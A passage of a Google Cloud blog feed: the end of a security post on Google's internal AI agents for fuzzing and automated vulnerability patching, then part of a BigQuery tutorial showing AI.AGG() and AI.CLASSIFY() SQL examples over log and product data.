        &lt;q class="uni-pull-quote__text"&gt;Stateless AI systems repeatedly fall into the same logical traps, such as attempting to fix bugs inefficiently and hallucinating about non-existent code. Our framework solves this by introducing a post-hoc self-reflection loop.&lt;/q&gt;

        
      &lt;/div&gt;
    &lt;/div&gt;
  &lt;/section&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our autonomous, multi-agent engine eliminates manual intervention:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Context and Drafting agents&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; synthesize product logic and existing unit tests to author initial fuzzing harnesses.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Building and Testing agents&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; execute the code and feed real-time compiler and linker errors into a Hallucination Cleaner agent, which acts as an automated mechanic to repair broken dependencies and build configurations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Quality Analyzer agents&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; monitor runtime execution, actively adjusting inputs to bypass code blockers and penetrate deeper into complex, stateful APIs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;4. The unified AI patching pipeline&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finding thousands of vulnerabilities at scale can create a dangerous remediation backlog without proper planning. To close the exposure window, our discovery tools route findings directly into an autonomous remediation pipeline:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Reproduce agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; replicates the crash in the sandbox.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Bug Context agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; maps the failure execution path.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Patch agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; generates a targeted code fix.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Evaluation agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; runs a rigorous regression loop (that re-compiles code and executes tests) to ensure the patch is safe. Only fully-validated fixes are submitted to a human reviewer.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;5. Autonomous and secure posture management&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Post-launch, we maintain security integrity with an autonomous security posture management (ASPM) system. By converting our security standard catalog into programmable skills files, the ASPM system continuously checks production systems for configuration drift, automatically triggering agentic remediation when a violation occurs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Continuous augmentation via self-reflection&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stateless AI systems repeatedly fall into the same logical traps, such as attempting to fix bugs inefficiently and hallucinating about non-existent code. Our framework solves this by introducing a post-hoc self-reflection loop. After a workflow concludes, a dedicated reflection agent analyzes execution logs, tool histories, and human feedback.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Successful trajectories and design patterns are permanented into a global knowledge store. When future agents spin up, this intelligence is injected directly into their context window, creating a compounding-interest effect on our security engineering. This approach has helped us to improve both the vulnerability fix success rate and efficiency. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Moving toward immune software&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud's internal journey demonstrates that protecting software at AI-scale requires a fundamental paradigm shift from human-dependent checklists to proactive multi-agent orchestration. By pairing open-source tooling like Mantis with autonomous, self-healing execution loops, we are pioneering a future of "immune" software development — where applications continuously discover, validate, and patch their own weaknesses in real-time.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can learn more about how we use Mantis and other tools to find and fix vulnerabilities at machine-speed&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-the-4-lessons-that-guided-ai-threat-defense"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Learn something new&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c454850&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Watch now&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://www.youtube.com/watch?v=C1wEjzOHh7Y&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: Cloud-CISO-Perspectives-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;In case you missed it&lt;/b&gt;&lt;/h3&gt;&lt;p&gt;Here are the latest updates, products, services, and resources from our security teams so far this month:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Verifiable trust in the AI era: What’s new in Confidential Computing&lt;/b&gt;: To help further strengthen verifiable privacy in cloud AI deployments, here’s our latest Confidential Computing innovations. &lt;a href="https://cloud.google.com/blog/products/identity-security/verifiable-trust-in-the-ai-era-whats-new-in-confidential-computing"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Choice, compliance, and collaboration: Europe’s path to open digital sovereignty&lt;/b&gt;: Our Sovereign Cloud solutions are designed to meet Europe's tiered compliance requirements at every level. &lt;a href="https://cloud.google.com/blog/products/identity-security/choice-compliance-and-collaboration-europes-path-to-open-digital-sovereignty"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;How AI Is rewriting the SecOps playbook&lt;/b&gt;: With adversaries operating at machine speed, defenders must prioritize speed, automation, and continuous decision-making. &lt;a href="https://www.wiz.io/blog/ai-rewriting-secops-playbook" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Google named a Leader in IDC MarketScape SIEM 2026 Vendor Assessment&lt;/b&gt;: We are proud to announce that Google has been named a Leader in the 2026 IDC MarketScape for worldwide SIEM platforms. &lt;a href="https://cloud.google.com/blog/products/identity-security/google-named-a-leader-in-idc-marketscape-siem-2026-vendor-assessment"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Announcing the Wiz Runtime Sensor for Windows&lt;/b&gt;: Wiz pairs real-time threat detection with a memory-safe architecture that scales efficiently to protect your essential cloud infrastructure. &lt;a href="https://www.wiz.io/blog/wiz-runtime-sensor-for-your-windows-environment" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;New VPC Service Controls updates can help secure agents&lt;/b&gt;: Designed for agentic workloads, new capabilities in VPC Service Controls can help establish a network-level, destination-based perimeter. &lt;a href="https://cloud.google.com/blog/products/identity-security/securing-agentic-ai-whats-new-in-vpc-service-controls"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Bug hunting on Gemini Spark&lt;/b&gt;: Gemini Spark brings a persistent agent to the Gemini App. Learn how to approach security testing for this new paradigm and focus on high-impact bugs. &lt;a href="https://bughunters.google.com/blog/spark-release" target="_blank"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Please visit the Google Cloud blog for more security stories &lt;a href="https://cloud.google.com/blog/products/identity-security"&gt;published this month&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;title&amp;#x27;, &amp;#x27;Join the Google Cloud CISO Community&amp;#x27;), (&amp;#x27;body&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c4548b0&amp;gt;), (&amp;#x27;btn_text&amp;#x27;, &amp;#x27;Learn more&amp;#x27;), (&amp;#x27;href&amp;#x27;, &amp;#x27;https://rsvp.withgoogle.com/events/google-cloud-ciso-community-interest-form-2026?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY25-Q1-global-GCP30328-physicalevent-er-dgcsm-parent-CISO-community-2025&amp;amp;utm_content=cisop_&amp;amp;utm_term=-&amp;#x27;), (&amp;#x27;image&amp;#x27;, &amp;lt;GAEImage: GCAT-replacement-logo-A&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;Threat Intelligence news&lt;/b&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;China-nexus threat actor targets medical community for cross-sector research&lt;/b&gt;: Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People's Republic of China (PRC)-nexus threat actor, targeting the North American academic, medical, and military research community, that went undetected for more than a year. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;ShinyHunters targets education sector with Oracle PeopleSoft exploit&lt;/b&gt;: Mandiant and GTIG have identified an active compromise and extortion campaign attributed to UNC6240 (ShinyHunters) targeting Oracle PeopleSoft application infrastructure. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Zero-day exploitation in Cisco Catalyst SD-WAN Manager&lt;/b&gt;: Mandiant has identified a threat actor targeting a vulnerability in Cisco Catalyst SD-WAN to escalate privileges from a compromised administrative account to root-level access. &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-day-exploitation-cisco-catalyst-sd-wan-manager"&gt;&lt;b&gt;Read more&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Please visit the Google Cloud blog for more threat intelligence stories &lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/"&gt;published this month&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;h3&gt;&lt;b&gt;Now hear this: Podcasts from Google Cloud&lt;/b&gt;&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Cloud Security Podcast: How Google Cloud uses LLMs to defend billions of users&lt;/b&gt;: Google Cloud CISO Chris Betz discusses AI Threat Defense, and emphasizes shifting security practices earlier in the development lifecycle through human-AI collaboration. &lt;a href="https://www.youtube.com/watch?v=5pRpigTWUsA" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Cloud Security Podcast: To couple or decouple SIEM&lt;/b&gt;: Alex Hurtado, director, Detection Engineering, Scanner, and Christopher Witter, DNR lead, Dropbox, debate the merits of centralized versus decentralized SIEM architectures. &lt;a href="https://www.youtube.com/watch?v=Csk7I9Utw_U" target="_blank"&gt;&lt;b&gt;Listen here&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;To have our Cloud CISO Perspectives post delivered twice a month to your inbox, &lt;a href="https://cloud.google.com/resources/google-cloud-ciso-newsletter-signup"&gt;sign up for our newsletter&lt;/a&gt;. We’ll be back in a few weeks with more security-related updates from Google Cloud.&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-how-google-cloud-security-uses-ai-internally" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-29T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/deep-dive-into-bigquery-ai-agg-function</id>
    <title>Synthesize the big picture and analyze trends with BigQuery's AI.AGG function</title>
    <updated>2026-06-29T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We recently announced the preview of the BigQuery &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-agg"&gt;&lt;code style="text-decoration: underline; vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; function. With &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, you can use natural-language instructions within a single line of SQL to summarize or synthesize information over millions of rows of unstructured or even multimodal data.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=KOGoiV3YNjc"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Summarize millions of rows with one line of SQL: AI.AGG&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=KOGoiV3YNjc"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While BigQuery already offers &lt;/span&gt;&lt;a href="https://medium.com/google-cloud/analyze-anything-with-ai-powered-sql-in-bigquery-80c0d3113656" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;powerful AI functions that help you analyze individual rows of data&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, analyzing unstructured data at scale requires a different approach.&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; lets you ask questions from unstructured data such as logs and documents, for example:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;What are the top three feature requests among the negative product reviews?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;What kind of errors are users seeing most frequently, and how should I start investigating them?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In which specific scenarios is our automated agent consistently failing to resolve customer issues?&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this post, we'll dive deeper into the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; function and look at a few of the use cases that it unlocks, including how it can be used in combination with BigQuery’s other managed AI functions for complex, intelligent data analysis.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Analyzing system logs with &lt;/span&gt;&lt;code&gt;&lt;span style="vertical-align: baseline;"&gt;AI.AGG()&lt;/span&gt;&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A great example of the power of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; is analyzing system logging. Log messages, warnings, errors, and stack traces can contain extremely useful information for improving your service, but it can be time- and labor-intensive to investigate them manually — especially if you operate at scale and have thousands of them to review.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, you can easily analyze many logs at once, grouping and prioritizing them to decide which ones to dig deeper into first. In fact, our BigQuery engineering team used this exact approach while developing &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; — using the function to help identify edge cases related to input handling for the feature itself!&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To demonstrate this, let’s analyze a public dataset of Apache Spark standard &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;INFO&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; logs available from &lt;/span&gt;&lt;a href="https://github.com/logpai/loghub" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Loghub&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Often, clusters can run into issues like memory thrashing, clock drift, or broadcast bottlenecks without ever throwing a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;FATAL&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; error. You can use &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to analyze these seemingly normal logs for hidden inefficiencies. You can load &lt;/span&gt;&lt;a href="https://github.com/logpai/loghub/blob/master/Spark/Spark_2k.log_structured.csv" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;the sample data file&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; into BigQuery using &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/batch-loading-data#loading_data_from_local_files"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;any of the supported methods, such as the UI, CLI, or client libraries&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. The following example assumes you’ve loaded the log file into a dataset called &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;bq_logs_demo&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and table named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;spark_logs_unstructured&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Notice how we construct the prompt here. We explicitly give the model permission to say "everything is fine," which prevents it from hallucinating errors, while instructing it to hunt for specific anomalies:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  Component AS spark_component,\r\n  COUNT(*) AS log_count,\r\n  AI.AGG(\r\n    Content,\r\n    &amp;#x27;Analyze these Spark system INFO logs. Provide a 2-sentence summary: First, describe the normal operation of this component. Second, explicitly identify any hidden inefficiencies, latency spikes, repeated retries, or unusual patterns.&amp;#x27;\r\n  ) AS performance_analysis\r\nFROM\r\n  `bq_logs_demo.spark_logs_structured`\r\nGROUP BY\r\n  Component\r\nORDER BY\r\n  log_count DESC;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c435ee0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can see in these results that &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; successfully acknowledges the "operating normally" messages while surfacing the critical diagnostic insights:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1 - Log Results" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_-_Log_Results.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;The query results pane showing the insights generated by AI.AGG() over the logs dataset.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Extracting categories from unstructured text and image data&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now, let’s look at some more use cases that demonstrate the flexibility of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, using one of BigQuery’s public datasets, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;cymbal_pets&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, a fictional pet supply shop. It includes a catalog of products carried by the store, with unstructured data like product names, descriptions, and images, making it a great example of the power of AI functions for handling unstructured data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, let’s say you want to categorize the products in the dataset. The first hurdle in this case isn't applying labels to your products, but discovering what categories exist across the product catalog. With &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, you can ask the model to analyze the raw product names and descriptions to identify the overarching categories for you.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- Identify categories of products from product name and description\r\nSELECT\r\n  AI.AGG(\r\n    (&amp;#x27;Product: &amp;#x27;, product_name, &amp;#x27; - Description: &amp;#x27;, description),\r\n    &amp;#x27;What are the major categories of these products?&amp;#x27; \r\n  ) AS category_description\r\nFROM\r\n  `bigquery-public-data.cymbal_pets.products`;&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c435f10&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This query returns a simple plaintext list of categories:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2 - query results" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_-_query_results.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;The plaintext result of categories determined by AI.AGG() over our products dataset.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This initial query is great for discovery, but a simple plaintext string isn't enough to build a reliable, automated data pipeline. To actually tag your data, you need to instruct &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AI.AGG()&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to return a structured format, like a JSON array. Then, you can use the structured categories as a parameter within another AI function, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/reference/standard-sql/bigqueryml-syntax-ai-classify"&gt;&lt;code style="text-decoration: underline; vertical-align: baseline;"&gt;AI.CLASSIFY()&lt;/code&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, to actually label each product with its category.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The following SQL statement completes each of these steps in one script:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;-- 1. Declare a variable to hold the array of categories\r\nDECLARE generated_labels ARRAY&amp;lt;STRING&amp;gt;;\r\n\r\n-- 2. Create a dataset to store the results\r\nCREATE SCHEMA IF NOT EXISTS categorized_cymbal_pets;\r\n\r\n-- 3. Generate the JSON string with AI.AGG and extract it into the variable\r\nSET generated_labels = (\r\n      SELECT \r\n        JSON_VALUE_ARRAY(\r\n          AI.AGG(\r\n            (&amp;#x27;Product: &amp;#x27;, product_name, &amp;#x27; - Description: &amp;#x27;, description), \r\n            &amp;#x27;Identify the major product categories. Return exactly one valid JSON array of strings. Do not include markdown code blocks, backticks, or conversational text.&amp;#x27;\r\n          )\r\n        )\r\n      FROM `bigquery-public-data.cymbal_pets.products`\r\n);\r\n\r\n-- 4. Feed the variable directly into AI.CLASSIFY\r\nCREATE OR REPLACE TABLE `categorized_cymbal_pets.categorized_products` AS (\r\nSELECT \r\n  product_name,\r\n  description,\r\n  AI.CLASSIFY(\r\n   (&amp;#x27;Product: &amp;#x27;, product_name, &amp;#x27; - Description: &amp;#x27;, description),\r\n    generated_labels\r\n  ) AS assigned_category\r\nFROM \r\n  `bigquery-public-data.cymbal_pets.products`\r\n);&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fed0c435eb0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can now view the resulting table, which includes an &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;assigned_category&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3 - categorized table preview" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_-_categorized_table_preview.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;A preview of the categorized_products table which includes the new assigned_category column created by AI.AGG() and AI.CLASSIFY().&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
